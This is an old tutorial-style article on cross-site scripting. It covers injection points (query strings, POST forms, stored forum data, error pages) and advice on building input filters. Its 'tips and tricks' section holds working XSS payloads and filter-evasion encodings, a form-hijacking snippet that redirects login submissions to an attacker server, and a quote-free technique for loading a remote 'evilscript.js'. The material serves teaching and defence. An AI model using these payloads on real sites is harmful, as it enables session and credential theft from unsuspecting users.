Real World XSS
Author: David Zimmer <dzzie@yahoo.com>
Site: http://sandsprite.com/Sleuth
Article Downloads: small_xss_utilities.zip
Section 1
- Introduction
- Prerequisites
- About the Article Downloads
- Impacts (Attack Scenario)
- Impact Summary
Section 2 - Methods of Injection, and filtering
- Injection Points
- Injection methods and filtering
- XSS scripting tips and tricks
Section 3 - Inside the mind, mental walk along of a XSS hack
Section 4 - Conclusion
INJECTION POINTS
The next logical step in understand XSS is to enumerate its injection points.
Where can our web applications fall victim? Since XSS works as an interaction with
active server content, any form of input should be filtered if it is ever to show up
in a html page.
The default example, and the easiest to exploit, is parameters passed in
through query string arguments that get written directly to page. These are enticingly
easy because all of the information can be provided directly in a clickable link
and does not require any other html to perform.
Many web authors feel that making their page only respond to POSTed
inputs gives them an added layer of security against these types of attacks. While
this can be true if coupled with other preventive measures, any where i can inject
a html form and have the user click a submit button, I can get them to post to a
form (and yes the form can be hidden and the submission easily automated).
The above two examples describe active XSS attacks. That is to say ways in
which a user has to take an action and make a choice to be hit with a XSS attack.
This gives the user the opportunity to examine the link or to discover us, this is no
good from the exploiters view. Sure it works, but it is to dependant and relies on
us not getting caught and having the user care enough to take some action.
More dangerous are passive XSS attacks. These are
defined as attacks I can perform where the user will not have to take any action,
they will not have to click on any link, and they will have no idea that anything
out of the ordinary is occurring. These attacks occur automatically and can hit very
very large audiences completely silently.
If the user has to take no action, how does the malicious data make it to
them? Database storage. Think of a messageboard, If I were able to post active scripting
in my post, anyone who viewed my page would automatically be executing whatever I
could cook up without even knowing it. Think laterally for a second and you will
quickly realize that any data store your web app does that eventually makes it back
for surfer viewing is potentially a target for a malicious user to create a passive
XSS attack with.
This is how I achieved the XSS User tracking mentioned in the above
example. I was performing a security audit for a large forum site. The site allowed
users to post articles and discussions and kept a marquee of the top 10 as part of its
default page template. Every single page on the site had this marquee, and through
parameter manipulation and its subsequent database storage, I was able to have the
server output my tracking code to every single surfers that was on the site.
I sat back, watched and catalogued all of the sites users as they navigated
amongst the pages. Had this not just been a demonstration, I could have literally linked
usernames and email addresses to those observed surfing habits. Probably not something
you would desire for your prized user base.
Sites that are particularly vulnerable to this form of attack would include
guest books, html chatrooms, messageboards, discussion forms etc. If you have any of
these on your site pay particular attention to filtering user supplied data. If you
do find a XSS hole on your site, you must also make sure to scrub your database to
break any of the existing code that may already be stored away. When you are doing
the filtering remember to use case insensitive search’s, it is a simple mistake but much to
easily overlooked.
Another note worth throwing in here, is that as business apps with private
intranets and integrated web applications become more prevalent, Even windows
developers have to start concerning themselves with the dangers of cross site scripting.
In a humorous example, the other day at work I was able to enter html code in a business
app we are developing, which in turn became displayed in the web app interface we
had integrated with it. This adds a whole new dimension to XSS and even Sql injection
attacks, but alas I digress.
One last Injection point to consider is your error pages. Some servers include
special "404 Page Not Found" or servlet error messages that detail the page that was
requested, or parameters passed in. If these elements are not filtered they provide a
perfectly overlooked breeding ground for XSS injection.
INJECTION METHODS AND FILTERING...
Now that we have a handle on the breadth of the problem, and where the
malicious input may come from...we have to understand just what data may be thrown
at us and how to combat it.
Active XSS is relatively easy to prevent by filtering out a series of
characters in any user input received. Since each page has a defined window
of inputs, they can all be filtered in a quite logical sequential way.
When we migrate to shielding against passive XSS attacks it is somewhat
of a different story. Often user information and data is taken in through a series
of web forms. The final pages, a conglomeration of many users supplied data. Of course,
again all input data must be filtered, but typically there are many more
places for err to crop up. This problem is compounded by the desire for many of these
types of datastorage web applications to allow the user to enter some html inputs.
Html is a very dynamic and free flowing language. Something that allows the web
to be as advanced and colorful as it is, and also something that can make it a nightmare
to parse and filter. To make matters even worse, browser technology and features are
expanding at an incredible rate. While this makes the web fun and dynamic, it makes
the security auditors job more difficult. How can you expect a legacy web application
to take into account new features, protocols and attack vectors? You cant.
The easiest way to deny cross site scripting (and probably the only really
secure way) is to deny users the ability to use any form of html in their data. If you
would like to allow html, just realize that your filtering routines must be designed
very wisely. Many many very large high profile sites have had XSS holes discovered in
them as the result of filter loop holes, including Yahoo and Hotmail.
The next logical step is to see some examples of just how XSS can get
inserted into a page. I have created a simplistic asp page that will walk you through
some common injection points and example exploitation of it. Please take a few minutes
to read through it and play with the examples. To see how it all works right click
and view source and identify where the injection occurred.
[ insert url of demo page here ]
FILTERING
Filtering can be both a relatively simple matter, and a vastly complex one all
at the same time. The incongruece lies in the extent of your needs. Your server
side scripting language of choice can also help you minimize your exposure.
Before we get into active server languages just let me admit I am most familiar
with asp so that is where the heft of my examples shall rest.
Lets assume you have a parameter coming in that you expect to be an integer. That
assumption can often be your downfall, which incidentally is also why these types of
parameters are often found to be sql injection points as well. Anyway.. integer types
are easy to filter. Actually we can let the ASP engine cleanse these for us in
one step. Consider the asp line:
x=cInt(Request.QueryString("num"))
What happens if our friend num is not an integer? ASP engine throws an error
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'cint'
Well that handles that. In perl I believe simply adding +0 to the variable will
have a similar effect and force the variable to be numeric.
But what about string types? That is where the brunt of the work is going to lie
and where all of the problems begin. If we do not want to allow any html input
what so ever then our job is simple. Remove all < signs and quotes and we should
be pretty safe as long as any html we insert into dynamically is always wrapped
in a quoted string. Note that if we had a page source something like:
<img src=/images/img<%Response.Write(Request.QueryString('nextimg'))%>%gt;
In this example removing quotes and < will make it very hard for an attacker to
create a usable attack but I would not venture to say it impossible.
Since the src= attribute is not quoted in anyway, there is nothing for
them to have to break out of. If the next img value merely contains a space in it
they will effectively be out of the src= attribute and able to insert their own code
such as onerror=. Even though technically they will be able to execute code with this
technique, scripting without the use of quotes is extremely hard (or at least I haven’t
discovered the trick to it yet) see the tips and tricks section for some techniques I am
playing with to try to work around it.
The last category and the most in-depth to cover is the technique and considerations
of allowing only some html content and trying to deny the use of malicious html and
scripting.
Users who would use these techniques include web mail providers, message boards and
html chatrooms. Before we go into script filtering we should expand on the
definition of malicious html some. If an attackers goal is only to wack your site
he might be just as content to make your new message board unusable to others as he
is to use it to exploit all your surfers. This could easily be done through pure html
tags with no attributes. It is doubtful that you would want your users to have the
ability to enter a <plaintext> tag that would turn the rest of your html page and forms
into an unusable blob of text. It is also unlikely that you would want them to embed
a 10000000 x 10000000 image of two elephants mating. When it comes to allowing users
to post html, just beware that you are in it for the long haul. Both in maintaining
your filters to current technological demands as well as accommodating for non script
based attacks.
Enough digression. Onto the filters. A good disclaimer to enter here is that I am not
that experienced in creating keyword filters. When it comes to my projects I filter
exclusively no html. I do however have alot of experience working around filters and
have read alot of discussions so with that in mind here we go.
The only sane implementation I have heard of is allowing a very confined list
of html you want to allow and denying all other tags. This could be implemented by
splitting the textblob at all < signs and then reading up to the first space in
each element to see what the tag type was. If the tag was recognizable and allowed
then grab the offset of the closing tag and replace the substring with a clean no
attribute version of it. If the tag was not allowed then it would be removed. If
the tag was not allowed and did not contain a closing > then I would ummm I don’t know
I would have to define the filter and experiment alot :)
For tags where you absolutely had to allow attributes such as img src= tags, I would grab
the necessary src= attribute, validate it, and then insert it into my own clean
img src= tag so I didn’t have to worry about any event handlers or lowsrc or dynsrc or
the like. The same technique would be applied to href= attributes. A safe list of
tags to allow along these guide lines would be:
<font face= size=></font>
<b></b>, <I></i>, <u></u>
<img src=>
<a href=></a>
Etc.etc. Really this is probably all I would allow by default. IF you need more follow
the above guidelines on implementation.
So assuming you follow the above guidelines and allow no tags and no attributes other
than those you copy over to the saved data what will you have to validate to make
sure your users are safe?
If the above list is all you allow, I will assume you can manage validating the
font size= and face= parameters. Img src and href= are two big ones worthy of
many debates and many dangers that I will attempt to present next.
Lets first look at our img src tag. We have cleansed it from all the tricks of
lowsrc dynsrc, event handlers and style elements simply by parsing out the src=
element. Now we must validate it.
I am walking through thoughts here as we go, so please forgive any jumps.
1)We have to quote the src= string to be safe and accommodate for urls with spaces.
2)We should remove all single & double quotes in it.
3)I would reject any urls with ? querystring identifiers in it and make sure
that it did not have .cgi, .pl .php .asp etc in the querystring. Sure we could
make a .jpg a perl script but we cant account for every loop hole and this is
already an overcautious measure against webbugs.
4)Next I would check the protocol. I would deny anything that wasn’t explicitly http://
So what do these filters prevent against?
Quoting the string makes sure they cannot escape the element attribute and insert
their own event handlers. This must be don’t in conjunction with step 2 replacing
all quotes. Actually you probably don’t have to replace both, just the ones you use
to quote the string with your src= element.
Denying all urls (for img src any) that had ? or reference to a server script would
deny users the ability to webbug your surfers. A danger of this could be collecting
stats on users and site and tracking users across pages by their referrer.
!!Note that any link aiming off server will reveal http referrer headers. This is a
major reason why web developers are told not to include important info in query strings
and how I used to collect admin logins to chat servers :P (It may also be a good idea
to add target=_blank to all links to avoid a possible referrer leak,[but there will always
be a referrer leak for img src tags])
Next we validate the protocol. For obvious reasons we probably don’t want to allow
the file:// protocol on links or images. For equally obvious reasons vbscript:
and javascript: would be an unpleasant experience. In the end it will be best to
not worry about what is there, and only worry about what isn’t. No http:// at the
beginning of the string, then deny the tag. The reason is it is relatively easy to
add protocol handlers to windows. Aim:// has its own that may have been found vulnerable
as well as icq:// if these protocols are present in an img tag that may be enough
to make the browser fire the registered program type.
As a humorous example, back in the days of IE5 I used to embed
an img src=telnet://myip:23 and then run a custom daemon. All of a sudden my friends
would complain that some window had popped up and that someone was typing text to
their screen! Heh parlor tricks gotta love em. On a more serious note, you can see
the possible danger.
One other thing I just thought of is the possible danger of line break tricks.
If you follow the above explicitly you should be ok, but if you were to vary at all
you should be aware that there is a whole subsection of filter bypassing techniques
based on inserting CR, LF or CRLF into input strings. I have also seen javascript
execute with a -> breaking it up. Consider how these may impact your filters
That should give you the basis for a sane implementation of a minimal content keyword
filter. If you try to base your filters off of just replacing keywords you are going
to run into all kinds of complexities like new elements, attributes you didn’t know about,
weird event handlers, script encoding, and even multiline tags that can throw your
parsing for a loop. If you want to try any of those techniques may the force be with
you luke *breathes like darth vader*
XSS SCRIPTING TIPS AND TRICKS
Well I couldn’t resist this section, this is where I have my most fun anyway.
This is some of the techniques people can hit you with with XSS
Q) Just how much script can you inject in an image src tag?
A) Its a different style of coding but it can get quite complex :)
<img src="javascript:txt='UghhOghh.!!! My Screen Just Ran Away!!!';
txt2='Now come on you have to admit that was funny *S*';x=0;y=80;
function niceguy(){nice=confirm(txt2);
if(nice==1){window.setTimeout('parent.window.moveTo(0,0)',2100)};}
function ha(x){parent.window.moveTo(x,y);if(x==1800)alert('Hehehe...me went Bye-bye ; )');
window.setTimeout('if(x!=1800){ha(x+=30);};else{niceguy()}',25)};
alert('*Yawn*..me tired');ha();">
|
Q) What are the biggest tricks useful in XSS javascripting?
1) knowing how to embed nested quotes is a necessity you can escape
quotes in a quoted string like this \' or \" or you can use
the unicode equilivents \u0022 and \u0027
ex: alert("\u0022") or alert("\"")
2) keyword filters that allow any js to execute are useless
ex: a='navi';b='gator.userAgent';alert(eval(a+b))
3) short input length + script block embed = unlimited script power if
you can squeeze in an script src=
4) ssl pages warn if script src= comes from untrusted site, but if you
can upload anything to the server like image or article that is
actually .js file commands, you can bypass this warning because
script src=file.jpg (also useful to help bypass input length reqs
(also note IE doesn’t care a wink about file extensions on script src=
files :)
5) you can read an entire pages content with javascript in IE, not just
limited to manipulating form elements. You can also edit the page
on the fly. learn your dhtml object model danielson !
6) event stealing: say a page with a log in form has a XSS hole,
document.forms[0].onsubmit=myfunction
document.forms[0].btnNew.onclick=myfunction
document.forms[0].action="http://myserver/myscript.asp"
7) styles trickery. I have to learn these tricks too! but from what I have
heard hinted at and mentioned in passing there are some cool power
tricks to be had!
8) be familiar with methods of script encoding.
<img src='vbscript:do%63ument.lo%63ation="http://www.yahoo.com"'>
<IMG SRC="javascript:alert('test');">
<IMG SRC="javasc ript:alert('test');"> <-- line break trick
\09 \10 \11 \12 \13 as delimiters all work.
9) working with no quotes (also necessary dealing with injection on php scripts)
with php scripts any " or ' we inject is automatically turned into
\" and \' respectively :( this is a big problem for complex scripts.
It kinda works ok for event handler insertion we can still close the
parent quotes because html doesn’t understand the \" escape sequence
and only sees the " this would let us use simple things where we could
get away with only using strings already found in the document, numbers
variables, etc but what if we need to include our own string?
chew on this:
regexp = /this is my string its actually a reg expression/
alert(regexp.source)
I haven’t really decided how useful an evasion this is yet. I myself
am still chewing away like overcooked steak. With this we can get away
with no quotes, however / which we need for urls are special chars and
need to be escaped in the reg exp. and php takes \ (which is the reg
exp escape char as an escape char and escapes it to \\ so that is
confusing. however we also have the power of regexps in our toolbox
and we have a host of built in objects to generate and build up strings
from so something like:
n=/http: myserver myfolder evilscript.js/
forslash=location.href.charAt(6)
space=n.source.charAt(5)
alert(n.source.split(space).join(forslash))
//document.scripts[0].src = n.source.split(space).join(forslash)
a little tricky but doable that chewed well after all *yummie*
another trick that could be useful with the no quotes hack is a simple
script encoder such as the below example
pcent=/%/.source
str=/20616c657274282774686973206973207265616c6c7920636f6f6c212729/.source
temp=str.substring(0,0)
for(i=0;i<str.length;i+=2){temp+=pcent+str.substring(i,i+2)}
eval(unescape(temp))
Voila, complex embeddable scripts with no quotes or forward slashes.
|